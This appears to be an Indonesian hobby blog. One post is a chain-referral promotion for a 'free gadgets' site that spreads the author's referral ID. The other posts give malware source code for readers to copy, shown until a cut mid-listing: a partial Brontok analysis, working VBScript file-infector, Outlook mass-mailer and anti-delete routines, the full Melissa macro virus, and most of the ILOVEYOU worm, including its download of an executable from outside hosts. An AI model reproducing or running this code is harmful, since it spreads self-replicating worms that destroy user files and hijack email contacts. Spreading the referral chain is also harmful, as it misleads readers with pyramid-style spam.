Dapat kan HP,Ipod,PS3 DLL gratis ko,, sumpahhhhhhhh!!!!!!!!!!!

Posted in | 17.14

Mau HP gratis??
HP, HDTV??
Yang gamers ada PS 3 atau X-Box??
Banyak deh pokoknya.. gue aja sampe bingung loh milih yang mana

Bener2 nggak bayar sama sekali (Free)!!!

Hari gini gratis!?? ga percaya??? hahahahaha
sama.. tadinya gue juga ga percaya, tp awalnya mang cuman iseng.

Mau coba?? gini Caranya:

1. Masuk ke sini : (klik aja langsung)
http://www.xpango.com?ref=92036201

2. pilih gratisan apa yang loe mau (ga cuman HP, ada iPod, ada game machine kaya OX, Nintendo DS, PSP, dll) pokoknya keren deh...

3. klick free gaming console,...Trus sign up (gratis kok) <<>> bagian bawah!
Isi alamat selengkap-lengkapnya (takut nyasar) he..he..he.. Pas pengisian kotak terakhir,, ada REFFERAL ID

5. isi refferal id dgn : 92036201. INGAT.. 92036201 (Remember)

Nanti akan ada email konfirmasi ke email loe yg jg ngasih refferal number buat loe.

setelah itu kirim pesan ini ke temen2loe dan ganti id refferal dengan id-loe

Makin byk temen yg loe ajak gabung, makin byk point yg loe dpt dan ketika loe dapetin jumlah point yg sesuai dgn hadiah / hp yg loe minta, bakalan dikirim tuh Hp/iPod/Gadget ke alamat loe..

sbg contoh, iPod 80GB nilainya 16 point, jd kalo loe bisa ajak 16 temen buat register aja, dpt deh .. asik kan? Coba deh, ga ada ruginya koq..
Kan, ga bayar sama sekali...
gampang kok.....
gabung ya
mumpung di indonesia masih sedkit yg gabung,
thank's b 4.
:: Xpango - Free Gaming Consoles, Free Mobile Phones, Free MP3 Players and Free HDTV's! ::
Sumber: www.xpango.com
:: Xpango - Free Gaming Consoles, Free Mobile Phones, Free MP3 Players and Free HDTV's! ::
Sumber: www.xpango.com

Read Users' Comments (0)

Virus Brontok

Posted in | 19.00

Yarohim.... buat elu nih..

Source Code Virus Brontok
Minggu 4 Oct 09 - by : jangkrikvirusdago
Dalam belakangan waktu ini mungkin anda pernah mendengar nama virus Brontok?......ya betul virus yang menduplikatkan dirinya dan menyesuaikan nama virus barunya berdasarkan folder atau file pada window epxlorer yang aktif. Ciri khas dari virus ini adalah menggunakan Icon folder, sehingga dapat mengecoh seseorang yang melihatnya.

Mengapa membahas virus ini?,...hmm...m....sebetulnya saya tidak terlalu tertarik membahas ini, tau nggak apa yang menyebabkan saya tertarik membahasnya?...pasti nggak tau kan .....ini disebabkan beberapa hari lalu banyak kehebohan mengenai virus brontok dan sempat menginfeksi beberapa komputer teman2ku .

Ok untuk mempersingkat waktu kita langsung aja

Setelah dilihat struktur file dari virus tersebut ternyata pembuatan virusnya menggunakan visual basic 6.0 ops....ternyata made in vb coy....nah ini yang membuat tambah menarik.

Virus ini terdiri dari 1 form da 1 Module, dengan nama

Form -> BrontokForm
Module -> API

Dengan detail berikut:

Begin VB.Form BrontokForm
Caption = \"Brontok.A\"
ForeColor = &H8000000F&
ScaleMode = 1
BeginProperty Font
Name = \"\"
Size = 195323.4944
Charset = 29
Weight = 774
EndProperty

Begin VB.Timer TmrBrontok
Enabled = 0 \'False
Interval = 2000
Left = 2160
Top = 0
Width = 57352
Height = 1
End
End


Dengan nama Project: Brontok.vbp, yang disimpan pada directory:
F:\\VPROJECT\\REHAB\\Re-1\\BRONTOK.A

Jelas sekali bahwa virus ini dibuat oleh sorang program lokal, yang mempunyai skill Menengah Keatas.

Ada beberapa procedure & function yang digunakan dengan nama:

Form_QueryUnload(Cancel As Integer, UnloadMode As Integer)
TmrBrontok_Timer()
Subr_004()
CekKoneksiInternet()
ManipulasiExec()
Subr_007()
KeluarDong()
BronReg()
CopyAppData()
DownloadVir()
StartDong()
StartUp()
DecTeks()
MutMutex()
MutCr()
DownloadFile()
CekUpdate()
InfekNetwork()
Judul()
CekRemDisk()
BikinFile()
GetEmailFile()
CekValidMail()
GetTeks()
CekKar()
ListMail()
GetTargetMBhs()
GavMailer()
BrontokMail()
Subr_031()
DataEmail()
DownMIME()
FindFilesAPI()
ListFileGav()
InfekFile()
SmallAttack()
MinggirLoe()
GetHostByNameAlias()
StripNulls()
BikinKredit()

Dan beberapa fungsi Api yang digunakan anatara lain:

Fungsi Baca Tulis Ke Register:
Declare Function RegOpenKeyExA Lib \"advapi32.dll\" ()
Declare Function RegSetValueExA Lib \"advapi32.dll\" ()
Declare Function RegCloseKey Lib \"advapi32.dll\" ()
Declare Function RegCreateKeyExA Lib \"advapi32.dll\" ()

Declare Function Sleep Lib \"kernel32\" ()

Mendapatkan Spesial Folder:
Declare Function SHGetPathFromIDList Lib \"shell32.dll\" ()
Declare Function SHGetSpecialFolderLocation Lib \"shell32.dll\" ()

Membaca Isi Halaman Situs:
Declare Function InternetOpenA Lib \"wininet.dll\" ()
Declare Function InternetOpenUrlA Lib \"wininet.dll\" ()
Declare Function InternetReadFile Lib \"wininet.dll\" ()
Declare Function InternetCloseHandle Lib \"wininet.dll\" ()

Mendapatkan Caption Dari Sebuah Window:
Declare Function GetWindowTextA Lib \"user32\" ()
Declare Function GetWindowTextLengthA Lib \"user32\" ()

Dapatkan HWND Window aktif:
Declare Function GetForegroundWindow Lib \"user32\" ()

Shutdown, Reboot, LogOff Windows:
Declare Function ExitWindowsEx Lib \"user32\" ()
Declare Function GetCurrentProcess Lib \"kernel32\" ()
Declare Function OpenProcessToken Lib \"advapi32\" ()
Declare Function LookupPrivilegeValueA Lib \"advapi32\" ()
Declare Function AdjustTokenPrivileges Lib \"advapi32\" ()

Mendapatkan Jenis Media yang ada spt Removable Disk, CD-Rom dll:
Declare Function GetDriveTypeA Lib \"kernel32\" ()

Declare Function ShellExecuteA Lib \"shell32.dll\" ()
Declare Function RtlMoveMemory Lib \"kernel32\" ()

Winsock API:
Declare Function closesocket Lib \"wsock32.dll\" ()
Declare Function connect Lib \"wsock32.dll\" ()
Declare Function htons Lib \"wsock32.dll\" ()
Declare Function inet_addr Lib \"wsock32.dll\" ()
Declare Function recv Lib \"wsock32.dll\" ()
Declare Function send Lib \"wsock32.dll\" ()
Declare Function socket Lib \"wsock32.dll\" ()
Declare Function gethostbyname Lib \"wsock32.dll\" ()
Declare Function WSAStartup Lib \"wsock32.dll\" ()
Declare Function WSACleanup Lib \"wsock32.dll\" ()
Declare Function WSAAsyncSelect Lib \"wsock32.dll\" ()

Fungsi yang berhubungan dengan file:
Declare Function FindFirstFileA Lib \"kernel32\" ()
Declare Function FindNextFileA Lib \"kernel32\" ()
Declare Function GetFileAttributesA Lib \"kernel32\" ()
Declare Function FindClose Lib \"kernel32\" ()
dll...

Terlihat jelas pada fungsi-fungsi api yang digunakan bahwa penularan virus ini brontok menggunakan beberapa cara. seperti pengiriman lewat email, pencarian nama komputer yang terhubung kejaringan dengan menyalin dirinya pada folder yang di sharing dan menyalin dirinya pada window explorer yang aktif. kalo gak salah si pembuat virus mempunyai SMTP sendiri (wah ati-ati mas ntar ketangkep)

Jika dilihat kembali pada strukturnya ada beberapa kata yang di encrypt, kemungkinan berupa exploit code atau apalah namanya. hanya allah dan pembuat virus yang tau.

Virus ini mempunyai fungsi ExitWindowsEx yang diimport dari file user32.dll, fungsi ini biasanya digunakan untuk mematikan windows.
kayaknya sipembuat virus membuat triger yang berisi perintah mematikan/merestart komputer.

Selain itu dalam struktur filenya terdapat kata-kata seperti ini:
FOLDER.HTT
RORO
.HTT
.DOC
.CSV
.EML
.CFM
.PHP
.WAB
.EML
.TXT
.HTML
.HTM
MY DATA SOURCES
MY EBOOKS
MY MUSIC
MY SHAPES
MY VIDEOS
MY DOCUMENT

Dan ada beberapa alamat situs yang diserang, apa DDOS ya...hik..hik..tau deh. Selain itu pembuat virus mencantumkan nama: --JowoBot#VM Community --

Selanjutnya coba lihat tiga fungsi api berikut:

Declare Function GetWindowTextA Lib \"user32\" ()
Declare Function GetWindowTextLengthA Lib \"user32\" ()
Declare Function GetForegroundWindow Lib \"user32\" ()

Sepertinya pembuat virus memanfaatkan windowexplorer untuk memperbanyak filenya ke folder yang lain. Dengan cara membaca Caption yang terdapat pada windows aktif yang berisi nama directory/path. Dengan menggunakan 2 fungsi diatas (GetWindowTextA & GetWindowTextLengthA), Sedangkan fungsi GetForegroundWindow digunakan untuk mendapatkan Handle Window (HWND) yang sedang aktif.

Jadi kesimpulannya virus ini tidak dapat menyalin dirinya kalo Caption pada windowExplorer bukan berupa Directory/Path. Sehinga si pembuat virus menonaktifkan setting pada Folder Options.

Kemudian yang lebih unik lagi virus ini membaca isi halaman situs yang terbuka pada sebuah InternetExplorer dengan menggunakan fungsi:

Declare Function InternetOpenA Lib \"wininet.dll\" ()
Declare Function InternetOpenUrlA Lib \"wininet.dll\" ()
Declare Function InternetReadFile Lib \"wininet.dll\" ()
Declare Function InternetCloseHandle Lib \"wininet.dll\" ()

Kalo saya tebak, sepertinya pembuat virus mencari alamat email pada halaman situs yang terbuka dan mengirimkan virus nya berdasarkan alamat email yang ditemukan pada halaman tersebut dengan kata kunci seperti mailto: ataupun @xxxx.com dll...

....Untuk membersihkannya silahkan baca selengkapnya di situs AntiVirus yang lain...he..he...maaf saya hanya membahas yang ini saja.

Tapi kalo pengen menonaktifkan virus ini secara cepat, coba masuk safemode kemudian rename file MSVBVM60.dll menjadi MSVBVM60.dl_
karena virus ini membutuhkan runtime vb. Nah kalo udah gak aktif baru kita bisa hapus beberapa registry entry dan file-file virus brontoknya.

Sayang sekali virus ini tidak menggunakan program compressor, sehingga memudahkan orang untuk mengenalinya.

Semoga bermanfaat.....


source :
- my friend: \"Anti Hacker\"
- vbbego.com
- http://www.familycode.phpbbweb.com

Read Users' Comments (0)

Virus VBS

Posted in | 18.44

Infeksi File Antar Visual Basic Script (.VBS)

Code:

On Error Resume Next
Set MawarPutih = CreateObject("Scripting.FileSystemObject")
Angel1()
Sub Angel1()
On Error Resume Next
Set a = CreateObject("Scripting.FileSystemObject")
For Each SalinMawarPutih In a.Drives
If SalinMawarPutih.DriveType = 2 _
Or SalinMawarPutih.DriveType = 3 Then
Angel3 (SalinMawarPutih.Path & "\")
End If
Next
End Sub
Sub Angel2(FileTarget)
On Error Resume Next
Set otf = a.GetFile(WScript.ScriptFullName)
ra = otf.ReadAll
otf.Close
Set a = CreateObject("Scripting.FileSystemObject")
Set f = a.GetFolder(FileTarget)
For Each n In f.Files
FileExt = LCase(a.GetExtensionName(n.Path))
If FileExt = "vbs" Or FileExt = "vbe" Then
Set openvbs = a.OpenTextFile(n.Path, 1)
vbsra = openvbs.ReadAll
openvbs.Close
If InStr(1, vbsra, "Tips And Trik by ") = False Then
Set MawarPutih = CreateObject("Scripting.FileSystemObject")
Set JC = MawarPutih.OpenTextFile(WScript.ScriptFullName, 1)
RantingMawarPutih = JC.ReadAll
JC.Close
Set MawarMerah = MawarPutih.OpenTextFile(n.Path, 8, True)
MawarMerah.WriteLine vbCrLf & "' Hack .VBS by " & vbCrLf & "Tz = " & Chr(34) & Chr(34)
For i = 1 To Len(RantingMawarPutih)
Tz = Mid(RantingMawarPutih, i, 1)
Tz = Hex(Asc(Tz))
If Len(Tz) = 1 Then
Tz = "0" & Tz
End If
Gz = Gz + Tz
If Len(Gz) = 110 Then
MawarMerah.WriteLine "Tz = Tz + """ + Gz + Chr(34)
Gz = ""
End If
If Len(RantingMawarPutih) - i = 0 Then
MawarMerah.WriteLine "Tz = Tz + """ + Gz + Chr(34)
Gz = ""
End If
Next
MawarMerah.WriteLine "Set MawarPutih = CreateObject(""Scripting.FileSystemObject"")"
MawarMerah.WriteLine "WriteAppend.Write CM(Tz)"
MawarMerah.WriteLine "WriteAppend.Close"
MawarMerah.WriteLine "Function CM(CN)"
MawarMerah.WriteLine "For GC = 1 To Len(CN) Step 2"
MawarMerah.WriteLine "CM = CM & Chr(""&h"" & Mid(CN, GC, 2))"
MawarMerah.WriteLine "Next"
MawarMerah.WriteLine "End Function"
MawarMerah.Close
End If
End If
Next
End Sub
Sub Angel3(FileTarget)
On Error Resume Next
Set a = CreateObject("Scripting.FileSystemObject")
Set f = a.GetFolder(FileTarget)
For Each n In f.SubFolders
Angel2 (n.Path)
Angel3 (n.Path)
Next
End Sub



penyebaran Melalui E-mail Via Outlook
Code:

On Error Resume Next

Set MawarPutih = CreateObject("Scripting.FileSystemObject")
Set MawarMerah = MawarPutih.GetFile(WScript.ScriptFullName)
MawarMerah.Copy (MawarPutih.GetSpecialFolder(0) & "\File Virus.txt.vbs")
Set Attachments = MawarPutih.GetFile(MawarPutih.GetSpecialFolder(0) & "\File Virus.txt.vbs")
Attachments.Attributes = 0
Set RantingMawar = CreateObject("Outlook.Application")
If Not RantingMawar = "" Then
For Each DuriMawar In RantingMawar.GetNameSpace("MAPI").AddressLists
For DaunMawar = 1 To DuriMawar.AddressEntries.Count
Set BagianEmail = RantingMawar.CreateItem(0)
BagianEmail.Recipients.Add (DuriMawar.AddressEntries(DaunMawar))
BagianEmail.Subject = "Judul Pesan"
BagianEmail.Body = "Isi Pesan"
BagianEmail.Attachments.Add (MawarPutih.GetSpecialFolder(0) & "\File Virus.txt.vbs")
BagianEmail.DeleteAfterSubmit = True
BagianEmail.Send
Next
Next
End If



Anti Delete
Code:

On Error Resume Next

Set MawarPutih= Createobject("scripting.filesystemobject")
Set MawarMerah= MawarPutih.opentextfile(wscript.scriptfullname, 1)
BatangMawar= MawarMerah.readall
MawarMerah.Close
Do
If Not (MawarPutih.fileexists(wscript.scriptfullname)) Then
Set DuriMawar= MawarPutih.createtextfile(wscript.scriptfullname, True)
DuriMawar.writeBatangMawar
DuriMawar.Close
End If
Loop


semua code diatas.. bisa kalian jadiin 1.. tinggal kreasinya aja...
thx_to: jangkrik virus dago

Read Users' Comments (0)

Virus Mellisa

Posted in | 18.42 

copy paste code virus nya


Private Sub AutoOpen()
On Error Resume Next
p$ = "clone"
If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") <> "" Then
CommandBars("Macro").Controls("Security...").Enabled = False
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
Else
p$ = "clone"
CommandBars("Tools").Controls("Macro").Enabled = False
Options.ConfirmConversions = (1 - 1): Options.VirusProtection = (1 - 1): Options.SaveNormalPrompt = (1 - 1)
End If
Dim UngaDasOutlook, DasMapiName, BreakUmOffASlice
Set UngaDasOutlook = CreateObject("Outlook.Application")
Set DasMapiName = UngaDasOutlook.GetNameSpace("MAPI")
If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\", "Melissa?") <> "... by Kwyjibo" Then
If UngaDasOutlook = "Outlook" Then
DasMapiName.Logon "profile", "password"
For y = 1 To DasMapiName.AddressLists.Count
Set AddyBook = DasMapiName.AddressLists(y)
x = 1
Set BreakUmOffASlice = UngaDasOutlook.CreateItem(0)
For oo = 1 To AddyBook.AddressEntries.Count
Peep = AddyBook.AddressEntries(x)
BreakUmOffASlice.Recipients.Add Peep
x = x + 1
If x > 50 Then oo = AddyBook.AddressEntries.Count
Next oo
BreakUmOffASlice.Subject = "Important Message From " & Application.UserName
BreakUmOffASlice.Body = "Here is that document you asked for ... don't show anyone else ;-)"
BreakUmOffASlice.Attachments.Add ActiveDocument.FullName
BreakUmOffASlice.Send
Peep = ""
Next y
DasMapiName.Logoff
End If
p$ = "clone"
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\", "Melissa?") = "... by Kwyjibo"
End If
Set ADI1 = ActiveDocument.VBProject.VBComponents.Item(1)
Set NTI1 = NormalTemplate.VBProject.VBComponents.Item(1)
NTCL = NTI1.CodeModule.CountOfLines
ADCL = ADI1.CodeModule.CountOfLines
BGN = 2
If ADI1.Name <> "Melissa" Then
If ADCL > 0 Then _
ADI1.CodeModule.DeleteLines 1, ADCL
Set ToInfect = ADI1
ADI1.Name = "Melissa"
DoAD = True
End If
If NTI1.Name <> "Melissa" Then
If NTCL > 0 Then _
NTI1.CodeModule.DeleteLines 1, NTCL
Set ToInfect = NTI1
NTI1.Name = "Melissa"
DoNT = True
End If
If DoNT <> True And DoAD <> True Then GoTo CYA
If DoNT = True Then
Do While ADI1.CodeModule.Lines(1, 1) = ""
ADI1.CodeModule.DeleteLines 1
Loop
ToInfect.CodeModule.AddFromString ("Private Sub Document_Close()")
Do While ADI1.CodeModule.Lines(BGN, 1) <> ""
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
BGN = BGN + 1
Loop
End If
p$ = "clone"
If DoAD = True Then
Do While NTI1.CodeModule.Lines(1, 1) = ""
NTI1.CodeModule.DeleteLines 1
Loop
ToInfect.CodeModule.AddFromString ("Private Sub Document_Open()")
Do While NTI1.CodeModule.Lines(BGN, 1) <> ""
ToInfect.CodeModule.InsertLines BGN, NTI1.CodeModule.Lines(BGN, 1)
BGN = BGN + 1
Loop
End If
CYA:
If NTCL <> 0 And ADCL = 0 And (InStr(1, ActiveDocument.Name, "Document") = False) Then
ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
ElseIf (InStr(1, ActiveDocument.Name, "Document") <> False) Then
ActiveDocument.Saved = True: End If
'WORD/Melissa written by Kwyjibo
'Clone written by Duke/SMF
'Works in both Word 2000 and Word 97
'Worm? Macro Virus? Word 97 Virus? Word 2000 Virus? You Decide!
'Word -> Email | Word 97 <--> Word 2000 ... it's a new age!
If Day(Now) = Minute(Now) Then Selection.TypeText "Twenty-two points, plus triple-word-score, plus fifty points for using all my letters. Game's over. I'm outta here."
End Sub

Read Users' Comments (0)

Virus I Love U

Posted in | 18.36 

Copy paste code virus ni!!!!!







rem barok -loveletter(vbe) 

rem by: spyder / ispyder@mail.com / @GRAMMERSoft Group /

Manila,Philippines

On Error Resume Next

dim fso,dirsystem,dirwin,dirtemp,eq,ctr,file,vbscopy,dow

eq=""

ctr=0

Set fso = CreateObject("Scripting.FileSystemObject")

set file = fso.OpenTextFile(WScript.ScriptFullname,1)

vbscopy=file.ReadAll

main()

sub main()

On Error Resume Next

dim wscr,rr

set wscr=CreateObject("WScript.Shell")

rr=wscr.RegRead("HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting

Host\Settings\Timeout")

if (rr>=1) then

wscr.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting

Host\Settings\Timeout",0,"REG_DWORD"

end if

Set dirwin = fso.GetSpecialFolder(0)

Set dirsystem = fso.GetSpecialFolder(1)

Set dirtemp = fso.GetSpecialFolder(2)

Set c = fso.GetFile(WScript.ScriptFullName)

c.Copy(dirsystem&"\MSKernel32.vbs")

c.Copy(dirwin&"\Win32DLL.vbs")

c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")

regruns()

html()

spreadtoemail()

listadriv()

end sub

sub regruns()

On Error Resume Next

Dim num,downread

regcreate

"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MSKernel32

",dirsystem&"\MSKernel32.vbs"

regcreate

"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices\Wi

n32DLL",dirwin&"\Win32DLL.vbs"

downread=""

downread=regget("HKEY_CURRENT_USER\Software\Microsoft\Internet

Explorer\Download Directory")

if (downread="") then

downread="c:\"

end if

if (fileexist(dirsystem&"\WinFAT32.exe")=1) then

Randomize

num = Int((4 * Rnd) + 1)

if num = 1 then

regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start

Page","http://www.skyinet.net/~young1s/HJKhjnwerhjkxcvytwertnMTFwetrdsfmhPnj

w6587345gvsdf7679njbvYT/WIN-BUGSFIX.exe"

elseif num = 2 then

regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start

Page","http://www.skyinet.net/~angelcat/skladjflfdjghKJnwetryDGFikjUIyqwerWe

546786324hjk4jnHHGbvbmKLJKjhkqj4w/WIN-BUGSFIX.exe"

elseif num = 3 then

regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start

Page","http://www.skyinet.net/~koichi/jf6TRjkcbGRpGqaq198vbFV5hfFEkbopBdQZnm

POhfgER67b3Vbvg/WIN-BUGSFIX.exe"

elseif num = 4 then

regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start

Page","http://www.skyinet.net/~chu/sdgfhjksdfjklNBmnfgkKLHjkqwtuHJBhAFSDGjkh

YUgqwerasdjhPhjasfdglkNBhbqwebmznxcbvnmadshfgqw237461234iuy7thjg/WIN-BUGSFIX

.exe"

end if

end if

if (fileexist(downread&"\WIN-BUGSFIX.exe")=0) then

regcreate

"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\WIN-BUGSFI

X",downread&"\WIN-BUGSFIX.exe"

regcreate "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start

Page","about:blank"

end if

end sub

sub listadriv

On Error Resume Next

Dim d,dc,s

Set dc = fso.Drives

For Each d in dc

If d.DriveType = 2 or d.DriveType=3 Then

folderlist(d.path&"\")

end if

Next

listadriv = s

end sub

sub infectfiles(folderspec)

On Error Resume Next

dim f,f1,fc,ext,ap,mircfname,s,bname,mp3

set f = fso.GetFolder(folderspec)

set fc = f.Files

for each f1 in fc

ext=fso.GetExtensionName(f1.path)

ext=lcase(ext)

s=lcase(f1.name)

if (ext="vbs") or (ext="vbe") then

set ap=fso.OpenTextFile(f1.path,2,true)

ap.write vbscopy

ap.close

elseif(ext="js") or (ext="jse") or (ext="css") or (ext="wsh") or (ext="sct")

or (ext="hta") then

set ap=fso.OpenTextFile(f1.path,2,true)

ap.write vbscopy

ap.close

bname=fso.GetBaseName(f1.path)

set cop=fso.GetFile(f1.path)

cop.copy(folderspec&"\"&bname&".vbs")

fso.DeleteFile(f1.path)

elseif(ext="jpg") or (ext="jpeg") then

set ap=fso.OpenTextFile(f1.path,2,true)

ap.write vbscopy

ap.close

set cop=fso.GetFile(f1.path)

cop.copy(f1.path&".vbs")

fso.DeleteFile(f1.path)

elseif(ext="mp3") or (ext="mp2") then

set mp3=fso.CreateTextFile(f1.path&".vbs")

mp3.write vbscopy

mp3.close

set att=fso.GetFile(f1.path)

att.attributes=att.attributes+2

end if

if (eq<>folderspec) then

if (s="mirc32.exe") or (s="mlink32.exe") or (s="mirc.ini") or

(s="script.ini") or (s="mirc.hlp") then

set scriptini=fso.CreateTextFile(folderspec&"\script.ini")

scriptini.WriteLine "[script]"

scriptini.WriteLine ";mIRC Script"

scriptini.WriteLine "; Please dont edit this script... mIRC will corrupt,

if mIRC will"

scriptini.WriteLine " corrupt... WINDOWS will affect and will not run

correctly. thanks"

scriptini.WriteLine ";"

scriptini.WriteLine ";Khaled Mardam-Bey"

scriptini.WriteLine ";http://www.mirc.com"

scriptini.WriteLine ";"

scriptini.WriteLine "n0=on 1:JOIN:#:{"

scriptini.WriteLine "n1= /if ( $nick == $me ) { halt }"

scriptini.WriteLine "n2= /.dcc send $nick

"&dirsystem&"\LOVE-LETTER-FOR-YOU.HTM"

scriptini.WriteLine "n3=}"

scriptini.close

eq=folderspec

end if

end if

next

end sub

sub folderlist(folderspec)

On Error Resume Next

dim f,f1,sf

set f = fso.GetFolder(folderspec)

set sf = f.SubFolders

for each f1 in sf

infectfiles(f1.path)

folderlist(f1.path)

next

end sub

sub regcreate(regkey,regvalue)

Set regedit = CreateObject("WScript.Shell")

regedit.RegWrite regkey,regvalue

end sub

function regget(value)

Set regedit = CreateObject("WScript.Shell")

regget=regedit.RegRead(value)

end function

function fileexist(filespec)

On Error Resume Next

dim msg

if (fso.FileExists(filespec)) Then

msg = 0

else

msg = 1

end if

fileexist = msg

end function

function folderexist(folderspec)

On Error Resume Next

dim msg

if (fso.GetFolderExists(folderspec)) then

msg = 0

else

msg = 1

end if

fileexist = msg

end function

sub spreadtoemail()

On Error Resume Next

dim x,a,ctrlists,ctrentries,malead,b,regedit,regv,regad

set regedit=CreateObject("WScript.Shell")

set out=WScript.CreateObject("Outlook.Application")

set mapi=out.GetNameSpace("MAPI")

for ctrlists=1 to mapi.AddressLists.Count

set a=mapi.AddressLists(ctrlists)

x=1

regv=regedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a)

if (regv="") then

regv=1

end if

if (int(a.AddressEntries.Count)>int(regv)) then

for ctrentries=1 to a.AddressEntries.Count

malead=a.AddressEntries(x)

regad=""

regad=regedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\"&malead)

if (regad="") then

set male=out.CreateItem(0)

male.Recipients.Add(malead)

male.Subject = "ILOVEYOU"

male.Body = vbcrlf&"kindly check the attached LOVELETTER coming from me."

male.Attachments.Add(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")

male.Send

regedit.RegWrite

"HKEY_CURRENT_USER\Software\Microsoft\WAB\"&malead,1,"REG_DWORD"

end if

x=x+1

next

regedit.RegWrite

"HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.AddressEntries.Count

else

regedit.RegWrite

"HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.AddressEntries.Count

end if

next

Set out=Nothing

Set mapi=Nothing

end sub

sub html

On Error Resume Next

dim lines,n,dta1,dta2,dt1,dt2,dt3,dt4,l1,dt5,dt6

dta1="LOVELETTER - HTML<?-?TITLE><META
<br />NAME=@-@Generator@-@ CONTENT=@-@BAROK VBS - LOVELETTER@-@>"&vbcrlf& _
<br />"<META NAME=@-@Author@-@ CONTENT=@-@spyder ?-? ispyder@mail.com ?-?
<br />@GRAMMERSoft Group ?-? Manila, Philippines ?-? March 2000@-@>"&vbcrlf& _
<br />"<META NAME=@-@Description@-@ CONTENT=@-@simple but i think this is
<br />good...@-@>"&vbcrlf& _
<br />"<?-?HEAD><BODY
<br />ONMOUSEOUT=@-@window.name=#-#main#-#;window.open(#-#LOVE-LETTER-FOR-YOU.HTM#
<br />-#,#-#main#-#)@-@ "&vbcrlf& _
<br />"ONKEYDOWN=@-@window.name=#-#main#-#;window.open(#-#LOVE-LETTER-FOR-YOU.HTM#
<br />-#,#-#main#-#)@-@ BGPROPERTIES=@-@fixed@-@ BGCOLOR=@-@#FF9933@-@>"&vbcrlf& _
<br />"<center><p>This HTML file need ActiveX Control<?-?p><p>To Enable to read
<br />this HTML file<br />- Please press #-#YES#-# button to Enable
<br />ActiveX<?-?p>"&vbcrlf& _
<br />"<?-?CENTER><MARQUEE LOOP=@-@infinite@-@
<br />BGCOLOR=@-@yellow@-@>----------z--------------------z----------<?-?MARQUEE>
<br />"&vbcrlf& _
<br />"<?-?BODY><?-?HTML>"&vbcrlf& _
<br />"<script language="@-@JScript@-@">"&vbcrlf& _
<br />"<!--?-??-?"&vbcrlf& _
<br />"if (window.screen){var wi=screen.availWidth;var
<br />hi=screen.availHeight;window.moveTo(0,0);window.resizeTo(wi,hi);}"&vbcrlf& _
<br />"?-??-?-->"&vbcrlf& _
<br />"<?-?SCRIPT>"&vbcrlf& _
<br />"<script language="@-@VBScript@-@">"&vbcrlf& _
<br />"<!--"&vbcrlf& _
<br />"on error resume next"&vbcrlf& _
<br />"dim fso,dirsystem,wri,code,code2,code3,code4,aw,regdit"&vbcrlf& _
<br />"aw=1"&vbcrlf& _
<br />"code="
<br />dta2="set fso=CreateObject(@-@Scripting.FileSystemObject@-@)"&vbcrlf& _
<br />"set dirsystem=fso.GetSpecialFolder(1)"&vbcrlf& _
<br />"code2=replace(code,chr(91)&chr(45)&chr(91),chr(39))"&vbcrlf& _
<br />"code3=replace(code2,chr(93)&chr(45)&chr(93),chr(34))"&vbcrlf& _
<br />"code4=replace(code3,chr(37)&chr(45)&chr(37),chr(92))"&vbcrlf& _
<br />"set wri=fso.CreateTextFile(dirsystem&@-@^-^MSKernel32.vbs@-@)"&vbcrlf& _
<br />"wri.write code4"&vbcrlf& _
<br />"wri.close"&vbcrlf& _
<br />"if (fso.FileExists(dirsystem&@-@^-^MSKernel32.vbs@-@)) then"&vbcrlf& _
<br />"if (err.number=424) then"&vbcrlf& _
<br />"aw=0"&vbcrlf& _
<br />"end if"&vbcrlf& _
<br />"if (aw=1) then"&vbcrlf& _
<br />"document.write @-@ERROR: can#-#t initialize ActiveX@-@"&vbcrlf& _
<br />"window.close"&vbcrlf& _
<br />"end if"&vbcrlf& _
<br />"end if"&vbcrlf& _
<br />"Set regedit = CreateObject(@-@WScript.Shell@-@)"&vbcrlf& _
<br />"regedit.RegWrite
<br />@-@HKEY_LOCAL_MACHINE^-^Software^-^Microsoft^-^Windows^-^CurrentVersion^-^Ru
<br />n^-^MSKernel32@-@,dirsystem&@-@^-^MSKernel32.vbs@-@"&vbcrlf& _
<br />"?-??-?-->"&vbcrlf& _
<br />"<?-?SCRIPT>"
<br />dt1=replace(dta1,chr(35)&chr(45)&chr(35),"'")
<br />dt1=replace(dt1,chr(64)&chr(45)&chr(64),"""")
<br />dt4=replace(dt1,chr(63)&chr(45)&chr(63),"/")
<br />dt5=replace(dt4,chr(94)&chr(45)&chr(94),"\")
<br />dt2=replace(dta2,chr(35)&chr(45)&chr(35),"'")
<br />dt2=replace(dt2,chr(64)&chr(45)&chr(64),"""")
<br />dt3=replace(dt2,chr(63)&chr(45)&chr(63),"/")
<br />dt6=replace(dt3,chr(94)&chr(45)&chr(94),"\")
<br />set fso=CreateObject("Scripting.FileSystemObject")
<br />set c=fso.OpenTextFile(WScript.ScriptFullName,1)
<br />lines=Split(c.ReadAll,vbcrlf)
<br />l1=ubound(lines)
<br />for n=0 to ubound(lines)
<br />lines(n)=replace(lines(n),"'",chr(91)+chr(45)+chr(91))
<br />lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
<br />lines(n)=replace(lines(n),"\",chr(37)+chr(45)+chr(37))
<br />if (l1=n) then
<br />lines(n)=chr(34)+lines(n)+chr(34)
